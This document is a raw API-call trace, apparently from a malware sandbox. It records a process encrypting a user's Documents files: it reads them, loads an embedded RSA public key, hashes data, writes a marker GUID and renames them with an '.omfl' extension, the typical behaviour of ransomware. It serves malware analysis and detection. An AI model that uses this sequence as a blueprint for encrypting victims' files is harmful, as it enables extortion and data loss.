0xdd2cbb0 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.084] GetCurrentThreadId () returned 0x618 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.084] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.084] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f08 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f20 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ef0 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.085] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.085] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f38 [0131.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0131.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0131.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0131.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f08 | out: hHeap=0x4970000) returned 1 [0131.086] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f08 [0131.086] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.087] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x12410, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.087] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.087] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.087] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.087] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.087] CloseHandle (hObject=0x5c8) returned 1 [0131.093] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sdFIn-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sdfin-.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\sdFIn-.pptx.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sdfin-.pptx.omfl")) returned 1 [0131.094] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.094] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.094] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.096] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0131.096] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdd083180, ftCreationTime.dwHighDateTime=0x1d5d82c, ftLastAccessTime.dwLowDateTime=0x6e34dce0, ftLastAccessTime.dwHighDateTime=0x1d5da98, ftLastWriteTime.dwLowDateTime=0x6e34dce0, ftLastWriteTime.dwHighDateTime=0x1d5da98, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tlPIR", cAlternateFileName="")) returned 1 [0131.096] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6161f0, ftCreationTime.dwHighDateTime=0x1d57d26, ftLastAccessTime.dwLowDateTime=0x22d82bb0, ftLastAccessTime.dwHighDateTime=0x1d5b3c1, ftLastWriteTime.dwLowDateTime=0x22d82bb0, ftLastWriteTime.dwHighDateTime=0x1d5b3c1, nFileSizeHigh=0x0, nFileSizeLow=0x17eda, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WaIalkjw85ztPa1.xlsx", cAlternateFileName="WAIALK~1.XLS")) returned 1 [0131.096] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WaIalkjw85ztPa1.xlsx") returned=".xlsx" [0131.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WaIalkjw85ztPa1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\waialkjw85ztpa1.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.096] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=98010) returned 1 [0131.096] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.099] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x17eb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.099] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.100] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x17eda, lpOverlapped=0x0) returned 1 [0131.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.101] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.101] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0131.103] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.103] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.103] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.103] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.103] GetLastError () returned 0x0 [0131.103] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.103] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0131.103] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.103] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.103] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.103] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.103] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.104] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0131.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.104] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f20 | out: hHeap=0x4970000) returned 1 [0131.104] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f38 | out: hHeap=0x4970000) returned 1 [0131.104] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.104] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.104] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f38 [0131.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16f20 [0131.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.104] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f38 | out: hHeap=0x4970000) returned 1 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f20 | out: hHeap=0x4970000) returned 1 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.105] GetCurrentThreadId () returned 0x618 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2cc40 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.105] GetCurrentThreadId () returned 0x618 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.105] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.105] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0131.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f20 [0131.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0131.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f38 [0131.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0131.106] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f08 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f50 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8a0 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f20 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f20 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.107] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.107] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 